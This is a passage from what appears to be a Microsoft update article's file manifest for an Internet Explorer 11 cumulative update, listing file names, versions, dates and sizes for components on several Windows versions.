\nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:36| 33,792 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:36| 23,040 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:37| 22,016 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:38| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:39| 31,232 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:39| 34,304 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:40| 35,840 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:41| 32,768 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:41| 33,280 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:42| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:43| 34,816 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:44| 33,280 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:44| 32,256 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:44| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:45| 32,768 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:46| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:47| 30,720 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:47| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:48| 16,384 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:48| 16,896 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:49| 16,896 \nJscript9.dll| 11.0.9600.20112| 14-Aug-21| 3:47| 5,508,096 \nJscript9diag.dll| 11.0.9600.20112| 14-Aug-21| 3:12| 814,592 \nJscript.dll| 5.8.9600.20112| 14-Aug-21| 3:12| 785,408 \nVbscript.dll| 5.8.9600.20112| 14-Aug-21| 3:22| 581,120 \nIexplore.exe| 11.0.9600.20112| 19-Aug-21| 18:56| 810,384 \nMshtml.dll| 11.0.9600.20112| 14-Aug-21| 3:33| 20,294,144 \nMshtml.tlb| 11.0.9600.20112| 14-Aug-21| 3:13| 2,724,864 \nWow64_microsoft-windows-ie-htmlrendering.ptxml| Not versioned| 14-Aug-21| 1:05| 3,228 \nIe9props.propdesc| Not versioned| 21-Mar-21| 3:55| 2,843 \nIeframe.dll| 11.0.9600.20112| 14-Aug-21| 2:47| 13,881,856 \nWow64_ieframe.ptxml| Not versioned| 14-Aug-21| 1:05| 24,486 \nJscript9.dll| 11.0.9600.20112| 14-Aug-21| 2:52| 4,119,040 \nJscript9diag.dll| 11.0.9600.20112| 14-Aug-21| 2:55| 620,032 \nJscript.dll| 5.8.9600.20112| 14-Aug-21| 2:56| 653,824 \nVbscript.dll| 5.8.9600.20112| 14-Aug-21| 3:04| 498,176 \nUrlmon.dll| 11.0.9600.20112| 14-Aug-21| 2:19| 1,342,976 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 46,592 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 52,736 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:58| 51,200 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 51,200 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 56,320 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:00| 57,856 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:58| 49,664 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 54,272 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 47,616 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 49,152 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 55,296 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 45,056 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 51,712 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 51,712 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 53,248 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:06| 39,424 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:07| 35,840 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 50,176 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 51,200 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 50,688 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 52,736 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 53,760 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:11| 54,272 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 54,272 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 52,736 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 51,200 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 53,248 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 52,736 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 51,712 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 50,688 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:16| 50,688 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 50,176 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:18| 30,720 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:19| 30,720 \nInetcpl.cpl| 11.0.9600.20112| 14-Aug-21| 2:35| 2,058,752 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 307,200 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 293,888 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:58| 290,304 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 289,280 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 299,008 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:00| 303,104 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:58| 282,112 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 296,960 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:02| 283,648 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:02| 291,840 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 299,520 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 275,968 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 290,816 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 293,376 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 296,960 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:06| 258,048 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:07| 256,512 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 289,280 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 288,256 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 285,184 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 295,424 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 297,472 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:11| 292,864 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 295,424 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 294,400 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 294,400 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 292,864 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 290,816 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 288,768 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 286,208 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:16| 281,600 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 286,720 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 292,352 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:18| 242,176 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:19| 243,200 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 46,080 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 50,176 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:58| 48,640 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 49,664 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 51,712 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:00| 54,272 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:57| 48,128 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 50,176 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:02| 47,616 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:02| 49,152 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 50,688 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 45,056 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 49,152 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 49,152 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 49,664 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:06| 39,936 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:07| 39,424 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 47,616 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 48,640 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 51,200 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 50,688 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:11| 49,664 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 50,176 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 49,152 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 48,640 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 50,176 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 48,640 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 49,664 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 48,640 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:16| 48,128 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 49,152 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 48,128 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:18| 35,328 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:19| 35,328 \nJsproxy.dll| 11.0.9600.20112| 14-Aug-21| 2:58| 47,104 \nWininet.dll| 11.0.9600.20112| 14-Aug-21| 2:27| 4,387,840 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 114,176 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 130,560 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 18:58| 124,928 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 122,880 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 130,048 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:00| 138,240 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 20:58| 114,688 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 131,584 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 117,760 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:02| 122,368 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 134,144 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 107,008 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 123,392 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 127,488 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:06| 128,512 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:06| 88,576 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:07| 82,944 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 125,440 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 123,392 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 120,320 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 130,560 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 129,024 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:11| 125,952 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 129,024 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 128,000 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 123,904 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 129,024 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 123,904 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 124,416 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 121,856 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:16| 115,712 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 123,904 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 125,440 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:18| 72,704 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:19| 73,728 \nMsfeedsbs.dll| 11.0.9600.20112| 14-Aug-21| 2:42| 52,736 \nMsfeedsbs.mof| Not versioned| 14-Aug-21| 1:11| 1,574 \nMsfeedssync.exe| 11.0.9600.20112| 14-Aug-21| 3:04| 11,776 \nIeproxy.dll| 11.0.9600.20112| 14-Aug-21| 2:14| 310,784 \nIeshims.dll| 11.0.9600.20112| 14-Aug-21| 2:18| 290,304 \nIertutil.dll| 11.0.9600.20112| 14-Aug-21| 3:07| 2,308,608 \nSqmapi.dll| 6.2.9200.16384| 19-Aug-21| 18:56| 228,256 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 2,066,432 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:58| 2,121,216 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:58| 2,075,648 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 2,063,872 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:00| 2,314,240 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 2,390,528 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:58| 2,033,152 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 2,307,584 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:02| 2,255,872 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 2,061,312 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 2,326,016 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 2,019,840 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 2,071,040 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 2,082,816 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:06| 2,307,584 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:07| 2,170,368 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:07| 2,153,984 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 2,291,712 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 2,283,520 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 2,052,096 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 2,301,952 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:11| 2,093,056 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:11| 2,075,648 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 2,299,392 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 2,094,592 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 2,316,800 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 2,305,536 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 2,278,912 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 2,285,568 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:16| 2,060,288 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:16| 2,315,776 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 2,279,424 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:18| 2,324,992 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:18| 2,098,176 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:19| 1,890,304 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:20| 1,890,304 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 29,184 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:58| 32,768 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 33,280 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:00| 35,328 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:00| 37,888 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:57| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 34,304 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:02| 33,280 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 34,304 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 27,648 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 34,304 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 33,792 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:06| 23,040 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:07| 22,016 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 31,232 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 34,304 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 35,840 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:11| 32,768 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 33,280 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 34,816 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 33,280 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 32,256 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 32,768 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:16| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 30,720 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:18| 16,384 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:19| 16,896 \nPackage.cab| Not versioned| 19-Aug-21| 22:40| 302,983 \n \n### **Windows 7 and Windows Server 2008 R2**\n\n### \n\n__\n\nInternet Explorer 11 on all supported x86-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nurlmon.dll| 11.0.9600.20112| 13-Aug-2021| 19:19| 1,342,976 \niexplore.exe| 11.0.9600.20112| 19-Aug-2021| 18:17| 810,400 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 31,744 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 36,352 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 35,328 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 34,816 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 36,864 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 39,424 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 32,768 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 37,376 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 33,280 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 34,816 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 38,400 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 30,720 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 34,816 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 35,328 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 36,864 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 25,600 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 24,576 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 35,840 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 34,304 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 34,304 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 36,352 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 35,840 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 34,816 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 35,840 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 35,840 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 34,304 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 35,840 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 34,816 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 34,816 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 34,816 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 33,280 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 34,304 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 34,304 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 20,992 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 21,504 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 21,504 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 46,592 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 52,736 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 51,200 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 51,200 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 56,320 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 57,856 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 49,664 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 54,272 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 47,616 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 49,152 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 55,296 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 45,056 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 51,712 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 51,712 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 53,248 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 39,424 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 35,840 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 50,176 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 51,200 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 50,688 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 52,736 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 53,760 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 54,272 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 54,272 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 52,736 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 51,200 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 53,248 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 52,736 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 51,712 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 50,688 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 50,688 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 50,176 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 50,176 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 30,720 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 30,720 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 30,720 \ninetcpl.cpl| 11.0.9600.20112| 13-Aug-2021| 19:35| 2,058,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 10,752 